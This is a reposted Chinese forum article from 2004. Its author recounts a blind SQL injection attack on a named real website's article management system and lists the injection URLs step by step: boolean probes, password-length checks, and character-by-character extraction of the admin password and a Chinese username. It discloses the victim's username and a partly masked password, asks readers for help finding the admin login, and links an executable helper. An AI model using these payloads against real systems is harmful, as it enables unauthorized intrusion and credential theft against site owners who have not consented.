您的位置:首页资讯网络应用 → 浪客联盟的文章管理的密码

浪客联盟的文章管理的密码

时间:2004/10/8 16:34:00来源:本站整理作者:蓝点我要评论(0)

    





浪客联盟的文章管理的密码
用户名:蛊惑男孩 密码:win!#%****
呵呵,欲望这个你熟吧。
本来是无意的,得到了你的用户名和密码,竟无法进入的你文章管理,不知道你把管理入口搬到哪里去了。
我就说说我是如何得到这个密码和用户名,
他的文章管理是动网的,因为list.asp对id没有过滤,所以可以进行注入攻击,本来LCX有个脚本的,可是我怎么也不会使只好自己手动了,
首先提交如下
http://longker.7x24.cn/article/list.asp?id=253 and 1=1
http://longker.7x24.cn/article/list.asp?id=253 and 1=2
发现如果为真则返回文章,否则返回找不到改文章,
好了,来判断管理员id
http://longker.7x24.cn/article/list.asp?id=253 and 1=(select id from admin where flag=1)
F返回文章》》》管理员ID为1
http://longker.7x24.cn/article/list.asp?id=253 and 1=(select max(id) from admin where flag=1)
返回文章》》》》只有一个管理员
http://longker.7x24.cn/article/list.asp?id=253 and 1=(select id from admin where len(password)>2)
返回文章》》》密码长度大于2
http://longker.7x24.cn/article/list.asp?id=253 and 1=(select id from admin where len(password)>11)
没返回文章》》》密码长度小于11
http://longker.7x24.cn/article/list.asp?id=253 and 1=(select id from admin where len(password)=10)
返回了》》》密码长度为10呵呵,有门了
http://longker.7x24.cn/article/list.asp?id=253 and 1=(select id from admin where asc(mid(password,1,1))>100)
这里解释一下,MID函数可以把密码分成若干部分取出,使用方法 MID(字符串,起始位,取出的字符串的长度),我的这句是说把PASSWORD中的第一位字符取出, ASC可以把字母转换成ASC码
然后我就判断他的ASC码的范围
返回了,好的,继续
http://longker.7x24.cn/article/list.asp?id=253 and 1=(select id from admin where asc(mid(password,1,1))>120)
这次没返回,看来介于100 和120
然后慢慢试,最后提交这个语句
http://longker.7x24.cn/article/list.asp?id=253 and 1=(select id from admin where asc(mid(password,1,1))=119)
返回了,好的,就是119,查一下,是 w
好的开始猜第二位
http://longker.7x24.cn/article/list.asp?id=253 and 1=(select id from admin where asc(mid(password,2,1))>100)
。。。。。。
没什么新意了,最后得到了密码
然后我就想他的用户名,下面有点意思
http://longker.7x24.cn/article/list.asp?id=253 and 1=(select id from admin where asc(mid(username,1,1))>100)
没有返回文章,慢慢我发现提交了很多也没返回,原来他的用户名是中文!
晕,怎么办???似乎不能用ASC来转换中文,
在研究了一点VB后,发现事情有了转机,大家都知道ASC都是正的,
但是汉字也可以ASC转换的,他是负!!而且一般都很大,很多嘛。
哈哈,好的,
提交如下:
http://longker.7x24.cn/article/list.asp?id=253 and 1=(select id from admin where asc(mid(username,1,1))>-18000)
哈哈,终于返回了文章!!
然后慢慢试得到了如下的四个码
-17978 蛊
-17421 惑
-15152 男
-17758 孩
呵呵,只要用CHR一转变就出汉字了。我自己顺手遍了个程序,在论坛的“汉字猜测”文章里。
输入码,出汉字。
好了,这里就得到了,但是我发现他把管理入口不知道弄到哪里去了,晕,一直猜了好久也没
猜到,动用GOOGLE也没查到,有没有高手给个方法??

顺便写了个转换小程序
http://www.roott.com/pig.exe

相关阅读 Windows错误代码大全 Windows错误代码查询激活windows有什么用Mac QQ和Windows QQ聊天记录怎么合并 Mac QQ和Windows QQ聊天记录Windows 10自动更新怎么关闭 如何关闭Windows 10自动更新windows 10 rs4快速预览版17017下载错误问题Win10秋季创意者更新16291更新了什么 win10 16291更新内容windows10秋季创意者更新时间 windows10秋季创意者更新内容kb3150513补丁更新了什么 Windows 10补丁kb3150513是什么

文章评论
发表评论

热门文章 360免费wifi电脑版怎么有道云笔记怎么保存网有道云笔记内容丢失怎360免费wifi一直显示正

最新文章 微博热搜宝盒是什么 微最新微信编辑器哪个好 百度网盘安全吗?百度网盘信息泄露怎么回事乐视云盘关闭怎么办 乐视云盘关闭怎么转移文百度云盘下载速度慢解决方法2017 百度云盘下百度网盘怎么用迅雷下载2017 百度网盘怎么用

人气排行 无线网络密码破解WPA/WPA2教程(包教包会)微信编辑器哪个好 3种实用微信编辑器推荐foxmail邮件存储位置在哪 foxmail7.2邮件存p2p种子搜索器用不了解决办法360免费wifi没有无线网卡怎么办百度云网盘中怎么添加好友 百度云网盘添加微信电脑版聊天记录保存在哪 微信电脑版文件360云盘上传速度慢怎么办 360云盘上传速度慢